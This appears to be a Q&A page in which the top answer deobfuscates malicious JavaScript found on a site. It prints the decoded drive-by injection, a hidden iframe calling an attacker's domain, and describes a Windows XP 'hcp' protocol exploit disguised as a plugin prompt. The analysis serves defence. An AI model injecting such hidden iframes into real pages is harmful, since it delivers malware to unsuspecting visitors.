Time: 2010-07-26 17:19:59

Tags: javascript security

3 answers:

Answer 0 (score: 42)

OK, so here's what I came up with...

Basically this script executes

document.body.append('<iframe height="1" src="http://macromediasetup.com/zombie/">');

The key is:

oU[11][oU[9]][oU[10]](xZ);

oU is an array populated by the following line:

oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);

oU[w] is a reference to Array.push. So calling it pushes these 13 items onto the array. f, hZ and r -> oU[11], oU[9] and oU[10] respectively are:

var f = document;
var hZ = 'b]o]dBy5'.xAW(/[5\];BD]/g, '');  // xAW is (presumably) the script's alias for String.prototype.replace; the ']' inside the class must be escaped; evaluates to "body"
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, ''); // evaluates to "appendChild"

So this becomes document['body']['append'], i.e. document.body.append()

xZ is the iframe string, so this adds the iframe to the page. While hitting macromediasetup.com directly just redirects to adobe.com, hitting the zombie route does something entirely different...

A whois on this domain shows it is not owned by Adobe:

$ whois macromediasetup.com
[Querying whois.verisign-grs.com]
[Redirected to whois.PublicDomainRegistry.com]
[Querying whois.PublicDomainRegistry.com]
[whois.PublicDomainRegistry.com]
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111

Domain Name: MACROMEDIASETUP.COM

Registrant:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Creation Date: 28-May-2010
Expiration Date: 28-May-2011

Domain servers in listed order:
    ns2.reg.ru
    ns1.reg.ru


Administrative Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Technical Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Billing Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Traceroute suggests it's somewhere in Latvia...

 7  nyk-bb1-link.telia.net (80.91.252.162)  77.169 ms  77.401 ms  77.327 ms
 8  kbn-bb1-link.telia.net (80.91.254.88)  156.938 ms  156.960 ms  156.842 ms
 9  s-bb1-link.telia.net (80.91.247.160)  166.491 ms  166.425 ms  166.499 ms
10  s-b3-link.telia.net (80.91.247.105)  212.715 ms  212.759 ms  212.776 ms
11  telia-latvija-ic-132810-s-b3.c.telia.net (213.248.82.134)  203.272 ms  203.313 ms  203.936 ms

EDIT: OK, so I did a little digging, just because it was interesting, and figured out exactly what is going on. The file included in the iframe retrieves a file which uses the "hcp" protocol hack against Windows XP machines. Basically the included file will display a "you need to install some nifty plugin you don't have" message in your browser... then, when you install it, you're in the shit.
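To make the two obfuscation tricks from the answer above concrete, here is an added example (not code from the original answer or from the malicious script) that replays them against a fake document object so the resolved call can be inspected offline, with no network and no real DOM. It assumes that the script's xAW is String.prototype.replace under another name, uses a placeholder iframe URL and placeholder names for the array slots the call never reads, and also shows that the second noise-stripped string decodes to "appendChild" rather than "append", and that the ']' inside the first character class has to be escaped for the stripping to work at all.

```javascript
// Added example, not code from the original answer: replays the noise-character
// stripping and array-index indirection described above against a fake
// document object, so the call can be resolved and inspected offline.

// The obfuscated script's xAW is assumed to be String.prototype.replace under
// another name; the noise patterns are the ones quoted in the answer.
function stripNoise(encoded, noisePattern) {
  return encoded.replace(noisePattern, '');
}

// Minimal stand-in for the browser document that records what is appended
// instead of creating nodes (a real appendChild would reject a plain string).
function makeFakeDocument() {
  const appended = [];
  return {
    body: {
      appendChild(node) {
        appended.push(node);
        return node;
      },
    },
    appended,
  };
}

// Resolve table[objIdx][table[propIdx]][table[methodIdx]](arg), which is the
// shape of oU[11][oU[9]][oU[10]](xZ), invoke it, and return a readable name.
function resolveIndirectCall(table, objIdx, propIdx, methodIdx, arg) {
  const prop = table[propIdx];
  const method = table[methodIdx];
  const target = table[objIdx][prop];
  const fn = target[method];
  if (typeof fn !== 'function') {
    throw new TypeError(`document.${prop}.${method} is not a function`);
  }
  fn.call(target, arg);
  return `document.${prop}.${method}(...)`;
}

// Walk through the answer's values. The ']' inside the first character class
// must be escaped; written unescaped, the class closes at the first ']' and the
// pattern becomes the literal text "5;BD]", which strips nothing.
function deobfuscate() {
  const f = makeFakeDocument();
  const hZ = stripNoise('b]o]dBy5', /[5\];BD]/g);
  const r = stripNoise('aNp6p)e6n#dNC0h6iNl0dN', /[N)0#6]/g);
  // Constructed placeholder payload; the real script carried an iframe tag.
  const xZ = '<iframe height="1" src="http://placeholder.invalid/">';

  // Rebuild the 13-slot array the script fills via oU[w](...). Only slots
  // 9 (hZ), 10 (r) and 11 (f) are read by the call; the others are
  // placeholder filler here.
  const oU = [];
  oU.push('oL', 's', 'q', 'jK', 'o', 'h', 'x', 'rE', 'jF', hZ, r, f, 'y');

  const call = resolveIndirectCall(oU, 11, 9, 10, xZ);
  return { hZ, r, call, appended: f.appended };
}

console.log(deobfuscate());
```

Running it with Node prints the decoded property name, the decoded method name, the resolved call ("document.body.appendChild(...)") and the single recorded payload; swapping the fake document for a real one is exactly what the obfuscated script does, which is why resolving the indirection first, in an isolated context, is the safe way to read such code.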

Answer 1 (score: 7)

Answer 2 (score: 4)